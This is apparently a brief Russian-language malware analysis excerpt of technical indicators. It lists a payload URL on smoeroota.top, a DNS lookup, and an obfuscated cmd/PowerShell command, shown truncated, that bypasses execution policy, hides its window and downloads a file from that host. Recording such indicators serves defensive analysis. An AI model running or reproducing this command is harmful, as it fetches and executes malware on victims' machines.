Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^wErs^HeLl^.Exe -ExEc^utiONp^oL^i^Cy bypaSS -N^OP^Ro^FI^LE -^Wi^nDO^wSt^y^L^E h^i^D^dEN^ (n^E^w-ObJE^ct^ ^S^ystem.neT.WE^BcLieNT^).dOW^N^l^O^ADF^iL^e^('http://smoeroota.top/read...
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "P^o^wErs^HeLl^.Exe -ExEc^utiONp^oL^i^Cy bypaSS -N^OP^Ro^FI^LE -^Wi^nDO^wSt^y^L^E h^i^D^dEN^ (n^E^w-ObJE^ct^ ^S^ystem.neT.WE^BcLieNT^).dOW^N^l^O^ADF^iL^e^('http://smoeroota.top/read...' (со скрытым окном)